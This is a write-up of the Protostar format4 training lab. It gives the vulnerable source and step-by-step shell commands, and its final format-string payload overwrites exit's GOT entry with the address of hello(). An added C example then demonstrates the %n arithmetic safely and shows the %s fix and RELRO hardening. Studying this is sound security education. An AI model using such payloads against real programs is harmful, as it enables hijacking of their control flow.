Protostar Format4 – Writeup

This is the last task of the Protostar format-string series. I gained a lot of experience from this lab. Thanks.

Description.

format4 looks at one method of redirecting execution in a process.

Hints

    objdump -TR is your friend

This level is at /opt/protostar/bin/format4

Format4.c

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void hello()
{
  printf("code execution redirected! you win\n");
  _exit(1);
}

void vuln()
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);

  printf(buffer);   /* user input is used directly as the format string */

  exit(1);          /* vuln() never returns; exit() is reached through its GOT entry */
}

int main(int argc, char **argv)
{
  vuln();
}

This task is a little different from the previous ones: we need to call the hello function to get the flag. Let's try.

[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "AAAA"+"%08x."*100')) | ./format4
AAAA00000200.b7fd8420.bffff614.41414141.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.

AAAA is located at argument position 4.

[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "AAAA"+"%4$08x."')) | ./format4
AAAA41414141.

In this task vuln() never returns; it calls exit(1). So the call to exit is what we have to turn into a call to hello, and for that we need the address of exit's GOT entry (its jump slot). We can use objdump again.

[email protected]:/opt/protostar/bin$ objdump -TR ./format4

./format4:     file format elf32-i386

DYNAMIC SYMBOL TABLE:
00000000  w   D  *UND*	00000000              __gmon_start__
00000000      DF *UND*	00000000  GLIBC_2.0   fgets
00000000      DF *UND*	00000000  GLIBC_2.0   __libc_start_main
00000000      DF *UND*	00000000  GLIBC_2.0   _exit
00000000      DF *UND*	00000000  GLIBC_2.0   printf
00000000      DF *UND*	00000000  GLIBC_2.0   puts
00000000      DF *UND*	00000000  GLIBC_2.0   exit
080485ec g    DO .rodata	00000004  Base        _IO_stdin_used
08049730 g    DO .bss	00000004  GLIBC_2.0   stdin


DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
080496fc R_386_GLOB_DAT    __gmon_start__
08049730 R_386_COPY        stdin
0804970c R_386_JUMP_SLOT   __gmon_start__
08049710 R_386_JUMP_SLOT   fgets
08049714 R_386_JUMP_SLOT   __libc_start_main
08049718 R_386_JUMP_SLOT   _exit
0804971c R_386_JUMP_SLOT   printf
08049720 R_386_JUMP_SLOT   puts
08049724 R_386_JUMP_SLOT   exit

Now we have the address of exit's GOT entry: 0x08049724.

[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "\x24\x97\x04\x08"+"%4$08x."')) | ./format4
$�08049724.

Now we need the address of the hello function.

[email protected]:/opt/protostar/bin$ objdump -t ./format4 | grep hello
080484b4 g     F .text	0000001e              hello

Convert it to decimal.

[email protected]:/opt/protostar/bin$ let x=0x080484b4; echo $x;
134513844

Then subtract the 4 bytes already printed (the address itself), because %n stores the number of bytes written so far: 134513844 - 4 = 134513840

[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "\x24\x97\x04\x08"+"%134513840u"+"%4$08n"')) | ./format4


Bingo! We got it again! Thanks for reading. Happy Hacking.
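The two ideas the walkthrough relies on, shown in a controlled form as an added example (this is not part of the Protostar lab sources or of the original writeup): first, the %n arithmetic, where "prefix" + "%<width>u" + "%n" stores prefix_len + width into the int that %n consumes, which is why the writeup computes 134513844 - 4; second, the one-line fix for vuln(), passing user input as an argument to a literal "%s" format rather than as the format itself. The function names, the "ABCD" stand-in for the four address bytes, and the small target values are all constructed for this demonstration; %n is pointed at an explicit local int and output goes to a stack buffer through snprintf, so no GOT entry or control flow is involved.

```c
#include <stdio.h>
#include <string.h>

/* Added example; not part of the Protostar lab or the writeup.
 * Names, the "ABCD" prefix and the target values are constructed. */

/* Width that makes "%<width>u%n" store exactly `target` when `prefix_len`
 * bytes have already been printed. Caller ensures target >= prefix_len.
 * Mirrors the writeup's 134513844 - 4 = 134513840. */
unsigned long width_for_target(unsigned long target, unsigned long prefix_len)
{
    return target - prefix_len;
}

/* Builds "ABCD%<width>u%n", evaluates it with snprintf, and returns the
 * value %n stored. "ABCD" stands in for the 4 address bytes of the
 * writeup's payload (a constructed stand-in, not a real address). */
int demo_n_write(unsigned long target)
{
    const char prefix[] = "ABCD";
    char fmt[64];
    char out[256];              /* large enough for the small targets used here */
    int written = 0;
    unsigned long width = width_for_target(target, sizeof prefix - 1);

    /* "%s%%%luu%%n" expands to e.g. "ABCD%36u%n" */
    snprintf(fmt, sizeof fmt, "%s%%%luu%%n", prefix, width);

    /* %u consumes the literal 1, %n consumes &written: every conversion has
     * an explicit argument, unlike printf(buffer) in vuln(). */
    snprintf(out, sizeof out, fmt, 1u, &written);
    return written;
}

/* Hardened equivalent of the echo in vuln(): input is data, never format.
 * Returns the number of bytes produced; any conversion specifiers in
 * `input` come out literally. */
int safe_echo(const char *input, char *out, size_t out_len)
{
    return snprintf(out, out_len, "%s", input);
}

/* Returns 1 if safe_echo reproduces `input` byte-for-byte, i.e. no
 * conversion specifier in it was interpreted. */
int safe_echo_is_literal(const char *input)
{
    char out[128];
    int n = safe_echo(input, out, sizeof out);
    return n == (int)strlen(input) && strcmp(out, input) == 0;
}

int main(void)
{
    char buf[64];
    printf("width for 0x080484b4 after 4 bytes: %lu\n",
           width_for_target(0x080484b4UL, 4));
    printf("%%n stored after \"ABCD%%36u\": %d\n", demo_n_write(40));
    safe_echo("%4$08x.%n", buf, sizeof buf);
    printf("safe echo of a format-looking line: %s\n", buf);
    return 0;
}
```

Compiling format4.c with `-Wformat -Wformat-security` makes gcc flag the `printf(buffer)` call, and linking with `-Wl,-z,relro,-z,now` maps the GOT read-only after startup, so the jump-slot overwrite this level depends on is no longer possible even if the format-string bug stays.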